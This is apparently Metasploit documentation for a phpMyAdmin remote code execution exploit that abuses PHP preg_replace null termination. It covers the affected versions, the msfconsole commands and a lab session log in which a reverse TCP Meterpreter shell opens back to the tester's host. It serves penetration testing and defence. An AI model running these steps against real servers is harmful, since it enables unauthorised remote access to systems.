metasploit-gs/documentation/modules/exploit/multi/http/phpmyadmin_null_termination_exec.md

Description

This module exploits a vulnerability in a PHP's preg_replace() function that is used by phpMyAdmin's replace table feature.

Vulnerable Application

PHP versions before 5.4.6 allow null termination of the preg_replace string parameter.

phpMyAdmin versions 4.6.x (prior to 4.6.3), 4.4.x versions (prior to 4.4.15.7), and 4.0.x versions (prior to 4.0.10.16) are affected.

Options

DATABASE This option specifies the database the module will use when creating a new table as part of the exploit.

Verification Steps

• Install vulnerable phpMyAdmin application
• Create database through phpMyAdmin application
• ./msfconsole
• use exploit/multi/http/phpmyadmin_null_termination_exec
• set USERNAME <username>
• set PASSWORD <password>
• set DATABASE <database>
• set rhost <rhost>
• run

Scenarios

Tested on Windows 7 x64 running phpMyAdmin 4.3.0 on PHP 5.3.8

msf5 > use exploit/multi/http/phpmyadmin_null_termination_exec
msf5 exploit(multi/http/phpmyadmin_null_termination_exec) > set rhost 172.22.222.122
rhost => 172.22.222.122
msf5 exploit(multi/http/phpmyadmin_null_termination_exec) > set database <database>
database => <database>
msf5 exploit(multi/http/phpmyadmin_null_termination_exec) > run

[*] Started reverse TCP handler on 172.22.222.177:4444 
[*] Sending stage (37775 bytes) to 172.22.222.122
[*] Sleeping before handling stage...
[*] Meterpreter session 2 opened (172.22.222.177:4444 -> 172.22.222.122:49169) at 2018-06-18 07:28:19 -0500
[-] 172.22.222.122:80 - Failed to remove the table 'spkkw'

meterpreter > sysinfo
Computer    : WIN-V438RLMESAE
OS          : Windows NT 6.1 build 7601 (Windows 7 Business Edition Service Pack 1) i586
Meterpreter : php/windows